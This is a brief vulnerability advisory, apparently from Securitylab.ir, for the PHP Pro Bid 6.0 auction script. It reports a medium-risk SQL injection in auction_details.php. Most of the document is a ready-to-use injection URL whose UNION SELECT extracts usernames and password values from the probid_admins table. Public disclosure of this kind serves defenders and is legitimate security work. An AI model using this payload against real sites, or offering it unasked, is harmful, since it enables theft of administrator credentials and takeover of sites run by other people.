################################################################# # Securitylab.ir ################################################################# # Application Info: # Name: PHP Pro Bid # Vendor: http://www.phpprobid.com # Version: 6.0 ################################################################# # Vulnerability Info: # Type: SQL Injection # Risk: Medium ################################################################# # Vulnerability: # http://site.com/auction_details.php? name = item name & auction_id = item ID and 1 = 2 union select concat (username, 0x3a, password, 0x3a), 1 from probid_admins-- ################################################################# # Discoverd By: Securitylab.ir # Website: http://securitylab.ir # Contacts: info[at]securitylab.ir ###################################################################